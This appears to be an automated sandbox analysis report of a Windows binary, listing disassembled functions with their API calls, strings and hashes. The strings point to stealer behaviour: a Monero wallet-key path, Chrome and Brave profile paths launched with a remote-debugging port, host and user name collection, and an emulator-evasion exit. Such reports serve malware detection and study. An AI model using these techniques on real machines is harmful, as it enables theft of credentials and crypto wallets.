                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 059f06a557e76a333d4d7b5b2608d09ed0de6dd632848ca790436d98f619d4f9
                              • Instruction ID: 3c615ffdb29cea82a5cf6bd384afa4ffbaa686a2de925eafd056fd4292d1bc04
                              • Opcode Fuzzy Hash: 059f06a557e76a333d4d7b5b2608d09ed0de6dd632848ca790436d98f619d4f9
                              • Instruction Fuzzy Hash: 2A01E4B0D44318AAEF50EBE4DC4ABAEBBB8FF14705F208448E704FA180D7B455868B59
                              Function 00827A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827AA0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00827AA7
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 00827ABF
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: d3b94eef39b00a09f76508d649fe2c9292857e236f1436e47ec86385d8b1b9fb
                              • Instruction ID: 6e147d9d87eed8e21fe2f0f4eece29cd8c1c7da15e5da29fd18d9c8bae98fa57
                              • Opcode Fuzzy Hash: d3b94eef39b00a09f76508d649fe2c9292857e236f1436e47ec86385d8b1b9fb
                              • Instruction Fuzzy Hash: 510186B1908359ABC700DFD9ED85FAFBBB8F704721F100119F605E62C0D7B55A408BA1
                              Function 00811110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0081112B
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00811132
                              • ExitProcess.KERNEL32 ref: 00811143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$AllocCurrentExitNumaVirtual
                              • String ID:
                              • API String ID: 1103761159-0
                              • Opcode ID: 4d46bb0f0eeaa456d7f9fe22ce49c3bc52a1fa47c26eaf6da8fe830c2f9daa76
                              • Instruction ID: 842f7988de3d737c029180c92b599dcc41012ad2c92e3e03da32cedc2fa715e4
                              • Opcode Fuzzy Hash: 4d46bb0f0eeaa456d7f9fe22ce49c3bc52a1fa47c26eaf6da8fe830c2f9daa76
                              • Instruction Fuzzy Hash: B7E08670D49308FBEB10DBD09C4EB8C766CEF04B01F100144F708BA1D0C6B425414759
                              Function 008110A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                              Download Yara Rule
                              APIs
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008110B3
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008110F7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocFree
                              • String ID:
                              • API String ID: 2087232378-0
                              • Opcode ID: 540830b40d697b92e80305f622e6ad1cb4791fa7923c88efcd93b62e87dc0481
                              • Instruction ID: d015654f450ba7610c81ed5f7c50a3446a49d7a0e5bbe75d054ad6be154cdcea
                              • Opcode Fuzzy Hash: 540830b40d697b92e80305f622e6ad1cb4791fa7923c88efcd93b62e87dc0481
                              • Instruction Fuzzy Hash: 4CF0E2B1641318BBEB149AA8AC99FAEB79CF709B04F300448F600E7280D5719E408BA0
                              Function 00811190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00827A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827AA0
                                • Part of subcall function 00827A70: RtlAllocateHeap.NTDLL(00000000), ref: 00827AA7
                                • Part of subcall function 00827A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00827ABF
                                • Part of subcall function 008279E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008111B7), ref: 00827A10
                                • Part of subcall function 008279E0: RtlAllocateHeap.NTDLL(00000000), ref: 00827A17
                                • Part of subcall function 008279E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00827A2F
                              • ExitProcess.KERNEL32 ref: 008111C6
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$AllocateName$ComputerExitUser
                              • String ID:
                              • API String ID: 3550813701-0
                              • Opcode ID: 913695e3fce6bf516a8d6fa830fd06f758fec35de5b7b24f6f29a314fdde62c2
                              • Instruction ID: e01c571a067ad480895dc984f7230c21d8b6a6905da8d2cc8b2eb871480e22e0
                              • Opcode Fuzzy Hash: 913695e3fce6bf516a8d6fa830fd06f758fec35de5b7b24f6f29a314fdde62c2
                              • Instruction Fuzzy Hash: B1E012B5904311A7CE10B3F97C4BB5F328CFF1435AF000818FE05C6112ED25E8914366

                              Non-executed Functions

                              Function 0081BE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • FindFirstFileA.KERNEL32(00000000,?,00830B32,00830B2F,00000000,?,?,?,00831450,00830B2E), ref: 0081BEC5
                              • StrCmpCA.SHLWAPI(?,00831454), ref: 0081BF33
                              • StrCmpCA.SHLWAPI(?,00831458), ref: 0081BF49
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081C8A9
                              • FindClose.KERNEL32(000000FF), ref: 0081C8BB
                              Strings
                              • Brave, xrefs: 0081C0E8
                              • \Brave\Preferences, xrefs: 0081C1C1
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0081C534
                              • Google Chrome, xrefs: 0081C6F8
                              • Preferences, xrefs: 0081C104
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0081C3B2
                              • --remote-debugging-port=9229 --profile-directory=", xrefs: 0081C495
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                              • API String ID: 3334442632-1869280968
                              • Opcode ID: d6abc775a93dfa50a13627e25741ce505512f8e707dc9e089d735369e0ed380c
                              • Instruction ID: 30d6b2ae0c2498706a2b93c81abb5757a6b5985037dffb4aa9f7390afd0d6293
                              • Opcode Fuzzy Hash: d6abc775a93dfa50a13627e25741ce505512f8e707dc9e089d735369e0ed380c
                              • Instruction Fuzzy Hash: BB52E0B29101189BCB18FBA4ED96EEE733DFF54300F404598B50AE6191EE345B89CB67
                              Function 00823B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00823B1C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00823B33
                              • lstrcat.KERNEL32(?,?), ref: 00823B85
                              • StrCmpCA.SHLWAPI(?,00830F58), ref: 00823B97
                              • StrCmpCA.SHLWAPI(?,00830F5C), ref: 00823BAD
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00823EB7
                              • FindClose.KERNEL32(000000FF), ref: 00823ECC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                              • API String ID: 1125553467-2524465048
                              • Opcode ID: 4703fd347420d49dd86bcea7ccf94231d1fbdb315ecd35f3bafed2882e4e304b
                              • Instruction ID: da6e86abbfdb592ec0cc7e0e17be7f78ae88c927cc2b9f1f011c4479013a0fe1
                              • Opcode Fuzzy Hash: 4703fd347420d49dd86bcea7ccf94231d1fbdb315ecd35f3bafed2882e4e304b
                              • Instruction Fuzzy Hash: A2A12FB1A002589BDB24DFA4DC95FEE7379FB88300F044588B60DDA181DB749B89CF52
                              Function 00824B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00824B7C
                              • FindFirstFileA.KERNEL32(?,?), ref: 00824B93
                              • StrCmpCA.SHLWAPI(?,00830FC4), ref: 00824BC1
                              • StrCmpCA.SHLWAPI(?,00830FC8), ref: 00824BD7
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00824DCD
                              • FindClose.KERNEL32(000000FF), ref: 00824DE2
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s$%s\%s$%s\*
                              • API String ID: 180737720-445461498
                              • Opcode ID: 5e38fc83d5fb24b867895b16fb14b7a6c1ac7173f537fd9584847ffb2b4e987a
                              • Instruction ID: b64d47b3b87ee96b014bc4077df1f5a93939e0e49aa7014431f2b17ed5c1077f
                              • Opcode Fuzzy Hash: 5e38fc83d5fb24b867895b16fb14b7a6c1ac7173f537fd9584847ffb2b4e987a
                              • Instruction Fuzzy Hash: 886116B1900258ABCB24EBE4EC95EEE737CFF48700F404598F609D6191EB759B858FA1
                              Function 008247C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008247D0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008247D7
                              • wsprintfA.USER32 ref: 008247F6
                              • FindFirstFileA.KERNEL32(?,?), ref: 0082480D
                              • StrCmpCA.SHLWAPI(?,00830FAC), ref: 0082483B
                              • StrCmpCA.SHLWAPI(?,00830FB0), ref: 00824851
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008248DB
                              • FindClose.KERNEL32(000000FF), ref: 008248F0
                              • lstrcat.KERNEL32(?,015FE4C0), ref: 00824915
                              • lstrcat.KERNEL32(?,015FD278), ref: 00824928
                              • lstrlen.KERNEL32(?), ref: 00824935
                              • lstrlen.KERNEL32(?), ref: 00824946
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                              • String ID: %s\%s$%s\*
                              • API String ID: 671575355-2848263008
                              • Opcode ID: 8894df9918513143dc099c88986bb1a1ae51b6277c563462fa14762073c24225
                              • Instruction ID: 34d79264ca1f6cf49e0c17438be3d15e1e7cf9bff1fde38b1f113b051e7c3ef0
                              • Opcode Fuzzy Hash: 8894df9918513143dc099c88986bb1a1ae51b6277c563462fa14762073c24225
                              • Instruction Fuzzy Hash: 645141B19042189BCB24EBB4DC99FED737CFB58300F404598B60AD6190EB749AC58FA1
                              Function 008240F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 00824113
                              • FindFirstFileA.KERNEL32(?,?), ref: 0082412A
                              • StrCmpCA.SHLWAPI(?,00830F94), ref: 00824158
                              • StrCmpCA.SHLWAPI(?,00830F98), ref: 0082416E
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 008242BC
                              • FindClose.KERNEL32(000000FF), ref: 008242D1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Find$File$CloseFirstNextwsprintf
                              • String ID: %s\%s
                              • API String ID: 180737720-4073750446
                              • Opcode ID: 2cddb344642f65d7d74bac896641697cb66466609e3d935cf5e9c6d9b9ea88d0
                              • Instruction ID: 2cf97077d3d7175203b2924368130f3cca59fee8c1c17bb39bf99152883fa670
                              • Opcode Fuzzy Hash: 2cddb344642f65d7d74bac896641697cb66466609e3d935cf5e9c6d9b9ea88d0
                              • Instruction Fuzzy Hash: 855145B1904218ABCB24EBB4EC85EEE737CFF58300F404689B61AD6050DB759BC58FA1
                              Function 0081EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 0081EE3E
                              • FindFirstFileA.KERNEL32(?,?), ref: 0081EE55
                              • StrCmpCA.SHLWAPI(?,00831630), ref: 0081EEAB
                              • StrCmpCA.SHLWAPI(?,00831634), ref: 0081EEC1
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 0081F3AE
                              • FindClose.KERNEL32(000000FF), ref: 0081F3C3
                              Strings
                              Memory Dump Source
